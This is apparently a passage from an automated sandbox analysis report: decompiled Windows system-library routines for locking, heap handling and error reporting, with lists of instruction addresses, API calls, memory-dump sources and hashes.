				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				void** _t55;
				void _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				void** _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x6b2cd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E6B1F2280(_t34, 0x6b2c8a6c);
				_t64 =  *0x6b2c5768; // 0x6b2c5768
				if(_t64 != 0x6b2c5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x6b2c5770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E6B1EFFB0(_t53, _t64, 0x6b2c8a6c);
						_t10 = _t64 + 0xc; // 0x6b1ce2b8
						 *0x6b2cb1e0(_v24, _t67);
						if( *((intOrPtr*)( *_t10))() != 0) {
							_v37 = 1;
						}
						E6B1F2280(_t45, 0x6b2c8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t15 = _t53 + 4; // 0x6b2c5768
							_t48 =  *_t15;
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x6b2c5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E6B1EFFB0(_t51, _t64, 0x6b2c8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E6B21B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                                                                                                            0x6b283d40
                                                                                                                            0x6b283d48
                                                                                                                            0x6b283d52
                                                                                                                            0x6b283d59
                                                                                                                            0x6b283d5d
                                                                                                                            0x6b283d61
                                                                                                                            0x6b283d63
                                                                                                                            0x6b283d67
                                                                                                                            0x6b283d69
                                                                                                                            0x6b283d72
                                                                                                                            0x6b283d76
                                                                                                                            0x6b283d7a
                                                                                                                            0x6b283d7f
                                                                                                                            0x6b283d8b
                                                                                                                            0x6b283d91
                                                                                                                            0x6b283d91
                                                                                                                            0x6b283d91
                                                                                                                            0x6b283d94
                                                                                                                            0x6b283d96
                                                                                                                            0x6b283d9d
                                                                                                                            0x6b283da1
                                                                                                                            0x6b283da7
                                                                                                                            0x6b283db0
                                                                                                                            0x6b283dba
                                                                                                                            0x6b283dbc
                                                                                                                            0x6b283dbc
                                                                                                                            0x6b283dc6
                                                                                                                            0x6b283dcb
                                                                                                                            0x6b283dcf
                                                                                                                            0x6b283dd1
                                                                                                                            0x6b283dd4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b283dd9
                                                                                                                            0x6b283e0c
                                                                                                                            0x6b283e0c
                                                                                                                            0x6b283e0f
                                                                                                                            0x6b283ddb
                                                                                                                            0x6b283ddb
                                                                                                                            0x6b283ddb
                                                                                                                            0x6b283de0
                                                                                                                            0x00000000
                                                                                                                            0x6b283de2
                                                                                                                            0x6b283de2
                                                                                                                            0x6b283de4
                                                                                                                            0x6b283de8
                                                                                                                            0x6b283deb
                                                                                                                            0x6b283df1
                                                                                                                            0x00000000
                                                                                                                            0x6b283df3
                                                                                                                            0x6b283df3
                                                                                                                            0x6b283df5
                                                                                                                            0x6b283df8
                                                                                                                            0x6b283dfa
                                                                                                                            0x00000000
                                                                                                                            0x6b283dfa
                                                                                                                            0x6b283df1
                                                                                                                            0x6b283de0
                                                                                                                            0x6b283e11
                                                                                                                            0x6b283e11
                                                                                                                            0x00000000
                                                                                                                            0x6b283dfe
                                                                                                                            0x6b283e04
                                                                                                                            0x6b283e06
                                                                                                                            0x00000000
                                                                                                                            0x6b283e06
                                                                                                                            0x00000000
                                                                                                                            0x6b283e04
                                                                                                                            0x6b283d91
                                                                                                                            0x6b283e15
                                                                                                                            0x6b283e1a
                                                                                                                            0x6b283e1f
                                                                                                                            0x6b283e1f
                                                                                                                            0x6b283e23
                                                                                                                            0x6b283e29
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b283e2e
                                                                                                                            0x00000000
                                                                                                                            0x6b283e30
                                                                                                                            0x6b283e30
                                                                                                                            0x6b283e35
                                                                                                                            0x00000000
                                                                                                                            0x6b283e37
                                                                                                                            0x6b283e3e
                                                                                                                            0x6b283e42
                                                                                                                            0x6b283e48
                                                                                                                            0x6b283e4e
                                                                                                                            0x00000000
                                                                                                                            0x6b283e4e
                                                                                                                            0x6b283e35
                                                                                                                            0x00000000
                                                                                                                            0x6b283e2e
                                                                                                                            0x6b283e5b
                                                                                                                            0x6b283e5c
                                                                                                                            0x6b283e5d
                                                                                                                            0x6b283e68
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C8A6C,?,00000000,00000000,?,?,?,?,?,?,6B283CAA,00000000,00008000,?), ref: 6B283D7A
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C8A6C,6B2C8A6C,?,00000000,00000000,?,?,?,?,?,?,6B283CAA,00000000,00008000,?), ref: 6B283DA1
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,6B2C8A6C,6B2C8A6C,?,00000000,00000000,?,?,?,?,?,?,6B283CAA,00000000,00008000), ref: 6B283DB0
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C8A6C,?,?,?,?,?,?,6B283CAA,00000000,00008000,?), ref: 6B283DC6
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C8A6C,6B2C8A6C,?,00000000,00000000,?,?,?,?,?,?,6B283CAA,00000000,00008000,?), ref: 6B283E1A
                                                                                                                            • RtlFreeHeap.1105(?,00000000,6B2C8A6C,6B2C8A6C,6B2C8A6C,6B2C8A6C,?,00000000,00000000,?,?,?,?,?,?,6B283CAA), ref: 6B283E4E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireRelease$DebugFreeHeapPrintTimes
                                                                                                                            • String ID: hW,k$hW,k
                                                                                                                            • API String ID: 1017367878-1947131103
                                                                                                                            • Opcode ID: 45ce7cc962da4075ddbb1694425809d374c95875c3ec01869af93981d3e1098c
                                                                                                                            • Instruction ID: ac3d19e3a130856925d16d1ae4b952759e062a40bbc590ebe9a806b5df8c0598
                                                                                                                            • Opcode Fuzzy Hash: 45ce7cc962da4075ddbb1694425809d374c95875c3ec01869af93981d3e1098c
                                                                                                                            • Instruction Fuzzy Hash: 7F31697150930ADFC710CF24C58595ABBF1FF85705F058AAEF8989B280D738D90ACBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F4120, Relevance: 13.9, APIs: 9, Instructions: 444memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,?,?,00000000,?,?), ref: 6B1F429E
                                                                                                                            • memmove.1105(?,?,?,?,00000000,?,?,00000000,?,?), ref: 6B1F430D
                                                                                                                            • memmove.1105(?,?,?,?,00000000,?,?,00000000,?,?), ref: 6B1F438E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memmove$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1771830547-0
                                                                                                                            • Opcode ID: 18cb26adcc8c8eeaaa82992402f10b297f838bc4cd6e295b972137cf1806edad
                                                                                                                            • Instruction ID: c2ab7780ac9280a9e46608ec1fc8239a13748ae942f043851adf25b5d6256b74
                                                                                                                            • Opcode Fuzzy Hash: 18cb26adcc8c8eeaaa82992402f10b297f838bc4cd6e295b972137cf1806edad
                                                                                                                            • Instruction Fuzzy Hash: 24F1AEB0A18311DBC714DF28C590A2AB7F5FF99705F01496EF499CB290E738D986CB62
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B204BAD, Relevance: 13.6, APIs: 9, Instructions: 131memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C8504,6B2C5338,00000000,6B2C5320), ref: 6B204BF9
                                                                                                                            • memset.1105(?,00000000,00000078,6B2C8504,6B2C5338,00000000,6B2C5320), ref: 6B204C17
                                                                                                                            • ZwTraceControl.1105(0000001E,00000000,00000018,?,00000078,?,6B2C5338,00000000,6B2C5320), ref: 6B204C5E
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C8504,C0000017,?,00000008,?,0000001E,00000000,00000018,?,00000078,?,6B2C5338,00000000,6B2C5320), ref: 6B204C9C
                                                                                                                            • RtlSetLastWin32Error.1105(00000000,6B2C8504,C0000017,?,00000008,?,0000001E,00000000,00000018,?,00000078,?,6B2C5338,00000000,6B2C5320), ref: 6B204CCD
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,0000001E,00000000,00000018,?,00000078,?,6B2C5338,00000000,6B2C5320), ref: 6B246784
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,?,0000001E,00000000,00000018,?,00000078,?,6B2C5338,00000000,6B2C5320), ref: 6B24679A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveHeapLock$AcquireAllocateControlErrorFreeLastReleaseTraceWin32memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 375855687-0
                                                                                                                            • Opcode ID: b1e2b09549530297b8fb622f73c2b41cda28e85c81f8a32e5c71d0efa935b9cf
                                                                                                                            • Instruction ID: 35a2e88b311346f1707108919925024fd024f89a59db3b1462563cd818f1ab3f
                                                                                                                            • Opcode Fuzzy Hash: b1e2b09549530297b8fb622f73c2b41cda28e85c81f8a32e5c71d0efa935b9cf
                                                                                                                            • Instruction Fuzzy Hash: A3419E35A4022DABCB21CF68C981FDA77F8EF45710F0141E5E918AB280DB7C9E81CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B204D3B, Relevance: 13.6, APIs: 9, Instructions: 131nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memset.1105(?,00000000,000000A0,00000000,00000000,00000024), ref: 6B204D77
                                                                                                                            • RtlRunOnceExecuteOnce.1105(6B2C86B0,6B205690,00000000,00000000,00000000,00000000,00000024), ref: 6B204D9E
                                                                                                                            • ZwTraceControl.1105(0000000F,?,000000A0,?,000000A0,?,00000000,00000000,00000024), ref: 6B204DE9
                                                                                                                            • memcmp.1105(00000000,6B1B5138,00000010,0000000F,?,000000A0,?,000000A0,?,00000000,00000000,00000024), ref: 6B204E26
                                                                                                                            • RtlNtStatusToDosError.1105(00000000,6B2C86B0,6B205690,00000000,00000000,00000000,00000000,00000024), ref: 6B246C6B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Once$ControlErrorExecuteStatusTracememcmpmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1949686928-0
                                                                                                                            • Opcode ID: 966409cfbf90906cbce0dfba14551095fee7ab56fa27627b6ca37dfe7458e592
                                                                                                                            • Instruction ID: 796d5097e88e1adb47e7223799af63affa3db66df9f235e266697c6d42428de7
                                                                                                                            • Opcode Fuzzy Hash: 966409cfbf90906cbce0dfba14551095fee7ab56fa27627b6ca37dfe7458e592
                                                                                                                            • Instruction Fuzzy Hash: A041A071A4031CAFEB218F24C8C5F96B7F9AB65714F0041DAE95597280DB78EE41CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FC182, Relevance: 13.6, APIs: 9, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,00000000,?,00000000,?,?,?,?,?,6B29C9F8,000000FE), ref: 6B1FC1D7
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,?,?,?,00000000,?,00000000,?,?,?,?,?,6B29C9F8,000000FE), ref: 6B1FC1F3
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,6B29C9F8,000000FE), ref: 6B1FC23A
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,00000000,?,00000000,?,?,?,?,?,6B29C9F8,000000FE), ref: 6B1FC26C
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,6B29C9F8,000000FE), ref: 6B1FC27D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$Release$AcquireCurrentServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4254861812-0
                                                                                                                            • Opcode ID: bdeba0c7626f7b2223eabf048399ca84a7f51063fc420e87d18673506539e28e
                                                                                                                            • Instruction ID: ed46f81d0c1a3017fcda2c6459f7d77bb84e17cc04b3b93bc839eb36f8b51974
                                                                                                                            • Opcode Fuzzy Hash: bdeba0c7626f7b2223eabf048399ca84a7f51063fc420e87d18673506539e28e
                                                                                                                            • Instruction Fuzzy Hash: 86310A72A0558AFED705DBB4C481BD9F7E8FF52208F04419AD4288B241DB3D595BD7A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20DE9E, Relevance: 13.6, APIs: 9, Instructions: 79memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,00000000,?,00000000,?,?,6B1D3A82,?,?,?,?,?,00000001,00000000,?,?), ref: 6B20DEB5
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,?,00000000,?,00000000,?,?,6B1D3A82,?,?,?,?,?,00000001,00000000,?), ref: 6B20DEBE
                                                                                                                              • Part of subcall function 6B1F2280: RtlDllShutdownInProgress.1105(00000000), ref: 6B1F22BA
                                                                                                                              • Part of subcall function 6B1F2280: ZwWaitForAlertByThreadId.1105(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6B1F23A3
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,00000000,?,00000000,?,?,6B1D3A82,?,?,?,?,?,00000001,00000000,?), ref: 6B20DECE
                                                                                                                            • ZwUnsubscribeWnfStateChange.1105(?,?,?,00000000,?,00000000,?,?,6B1D3A82,?,?,?,?,?,00000001,00000000), ref: 6B20DEEE
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,00000000,?,00000000,?,?,6B1D3A82,?,?,?,?,?,00000001), ref: 6B20DF0A
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,?,?,?,?,00000000,?,00000000,?,?,6B1D3A82,?), ref: 6B20DF25
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,00000000,?,00000000,?,?,6B1D3A82,?,?,?,?,?,00000001), ref: 6B20DF33
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,?,00000000,?,?,6B1D3A82,?,?,?,?,?,00000001,00000000), ref: 6B20DF40
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,?,?,?,00000000,?,00000000,?,?,6B1D3A82,?), ref: 6B24B46E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$Release$AcquireFreeHeap$AlertChangeCurrentProgressServiceSessionShutdownStateThreadUnsubscribeWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3923771875-0
                                                                                                                            • Opcode ID: 9df1af40294ad798b35a2f3de093006aca83cd2f771443f53e58250a6f341b6d
                                                                                                                            • Instruction ID: d6d92d3147774973a89cd829e8cf4987ab377e3c189e6fc2e919cd8ebb30d99c
                                                                                                                            • Opcode Fuzzy Hash: 9df1af40294ad798b35a2f3de093006aca83cd2f771443f53e58250a6f341b6d
                                                                                                                            • Instruction Fuzzy Hash: A621F572185649ABD7209B38CC89F56B7FCFF41758F0045A5F8158B6A0DB7CE802CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B257365, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 177nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlRunOnceExecuteOnce.1105(6B2C86E4,6B219490,00000000,00000000,00000000,00000000), ref: 6B25739F
                                                                                                                            • ZwQuerySystemInformation.1105(00000067,?,00000008,00000000,6B2C86E4,6B219490,00000000,00000000,00000000,00000000), ref: 6B2573D7
                                                                                                                              • Part of subcall function 6B219860: LdrInitializeThunk.NTDLL(6B2615BB,00000073,?,00000008,00000000,?,00000568), ref: 6B21986A
                                                                                                                            • RtlCaptureContext.1105(?,6B2C86E4,6B219490,00000000,00000000,00000000,00000000), ref: 6B2575C9
                                                                                                                            • memset.1105(?,00000000,00000050,?,6B2C86E4,6B219490,00000000,00000000,00000000,00000000), ref: 6B2575D8
                                                                                                                            • RtlReportException.1105(C0000409,?,0000001E,00000000,00000000), ref: 6B25761A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Once$CaptureContextExceptionExecuteInformationInitializeQueryReportSystemThunkmemset
                                                                                                                            • String ID: S,k$S,k
                                                                                                                            • API String ID: 3658138377-2203817779
                                                                                                                            • Opcode ID: d89dc5dbdaf6ff6853c54f31a3807e364cdee8545aeb57e4abb7dae1a7f3c2f6
                                                                                                                            • Instruction ID: 575f383dd0c6e04906cc40faa7b7fbee00eee4e88d83fd3b0a352fa1b04d55db
                                                                                                                            • Opcode Fuzzy Hash: d89dc5dbdaf6ff6853c54f31a3807e364cdee8545aeb57e4abb7dae1a7f3c2f6
                                                                                                                            • Instruction Fuzzy Hash: 19816DB1D0522C9BDB60CF6AC981BDDFBF8BB48310F5081AEE64CA7241D7749A848F55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2823E3, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlCompareMemory.1105(-00000010,6B1B6C58,00000008,?,-00000018,?,?,?,6B294BD7), ref: 6B282524
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,-00000010,6B1B6C58,00000008,?,-00000018,?,?,?,6B294BD7), ref: 6B282554
                                                                                                                            • DbgPrint.1105(HEAP: ,-00000010,6B1B6C58,00000008,?,-00000018,?,?,?,6B294BD7), ref: 6B282561
                                                                                                                            • DbgPrint.1105(Heap block at %p modified at %p past requested size of %Ix,-00000018,?,?,-00000010,6B1B6C58,00000008,?,-00000018,?,?,?,6B294BD7), ref: 6B282574
                                                                                                                            Strings
                                                                                                                            • HEAP: , xrefs: 6B28255C
                                                                                                                            • HEAP[%wZ]: , xrefs: 6B28254F
                                                                                                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 6B28256F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print$CompareMemory
                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                            • API String ID: 216965414-3815128232
                                                                                                                            • Opcode ID: 07c221bc4a82c1595d97590e4595ed9edc40575cedd27b60b5028002814b9aa8
                                                                                                                            • Instruction ID: df02acaee267de1472f8f6cbcf249b667131bfd4ad46a25072632e2a0a5a4a52
                                                                                                                            • Opcode Fuzzy Hash: 07c221bc4a82c1595d97590e4595ed9edc40575cedd27b60b5028002814b9aa8
                                                                                                                            • Instruction Fuzzy Hash: 1B5148B41601699AE364CF2AC8C4B7277E1EB45746F10889AE8D98B2C5D33DD84FDB30
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B261570, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B2616FA: ZwQueryWnfStateNameInformation.1105(6B1BFB74,00000001,00000000,00000568,00000004,?,?,00000000,?,?,?,?,6B2615A3,?,00000568), ref: 6B261718
                                                                                                                              • Part of subcall function 6B2616FA: ZwUpdateWnfStateData.1105(6B1BFB74,00000000,00000000,00000000,00000000,00000000,00000000,6B1BFB74,00000001,00000000,00000568,00000004,?,?,00000000), ref: 6B26172D
                                                                                                                              • Part of subcall function 6B2616FA: EtwEventWriteNoRegistration.1105(6B1BFB7C,?,00000000,00000000,6B1BFB74,00000001,00000000,00000568,00000004,?,?,00000000,?,?,?,?), ref: 6B26174B
                                                                                                                            • ZwQuerySystemInformation.1105(00000073,?,00000008,00000000,?,00000568), ref: 6B2615B6
                                                                                                                              • Part of subcall function 6B219860: LdrInitializeThunk.NTDLL(6B2615BB,00000073,?,00000008,00000000,?,00000568), ref: 6B21986A
                                                                                                                              • Part of subcall function 6B26176C: ZwOpenEvent.1105(00000568,00100001,?,?,00000000), ref: 6B2617B5
                                                                                                                              • Part of subcall function 6B26176C: ZwWaitForSingleObject.1105(00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 6B2617E1
                                                                                                                              • Part of subcall function 6B26176C: ZwClose.1105(00000568,00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 6B2617EB
                                                                                                                            • RtlInitUnicodeString.1105(?,\WindowsErrorReportingServicePort,00000073,?,00000008,00000000,?,00000568), ref: 6B2615EC
                                                                                                                            • memset.1105(?,00000000,0000002C,?,\WindowsErrorReportingServicePort,00000073,?,00000008,00000000,?,00000568), ref: 6B2615F8
                                                                                                                            • ZwAlpcConnectPort.1105(?,?,00000018,?,00020000,?,00000000,00000000,00000000,00000000,?), ref: 6B261673
                                                                                                                            • ZwAlpcSendWaitReceivePort.1105(?,00020000,?,00000000,?,00000568,00000000,?,?,?,00000018,?,00020000,?,00000000,00000000), ref: 6B2616B0
                                                                                                                            • ZwClose.1105(00000000,?,00000568), ref: 6B2616E3
                                                                                                                            Strings
                                                                                                                            • \WindowsErrorReportingServicePort, xrefs: 6B2615E3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AlpcCloseEventInformationPortQueryStateWait$ConnectDataInitInitializeNameObjectOpenReceiveRegistrationSendSingleStringSystemThunkUnicodeUpdateWritememset
                                                                                                                            • String ID: \WindowsErrorReportingServicePort
                                                                                                                            • API String ID: 360723211-589754893
                                                                                                                            • Opcode ID: c52a1f625829328fd6237e2fa39210ade5fc0b8a71b16a9526311b0ac32bd7b3
                                                                                                                            • Instruction ID: e40fe6ee0ce2d93a15818ff5aa6d2faaaf5e10c1ae1fe0f0d04a30a0f1bac8c1
                                                                                                                            • Opcode Fuzzy Hash: c52a1f625829328fd6237e2fa39210ade5fc0b8a71b16a9526311b0ac32bd7b3
                                                                                                                            • Instruction Fuzzy Hash: 1041A775D0162DABDB10CFE5C8C1AEEB7F8BF18745F14112AE905A7290E734AD85CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1EDD80, Relevance: 12.3, APIs: 8, Instructions: 337nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockShared.1105(6B2C8654,6B2217F0,00000000), ref: 6B1EDDCE
                                                                                                                            • ZwQueryVirtualMemory.1105(000000FF,000000FE,00000006,?,0000000C,00000000,6B2217F0,00000000), ref: 6B1EDE98
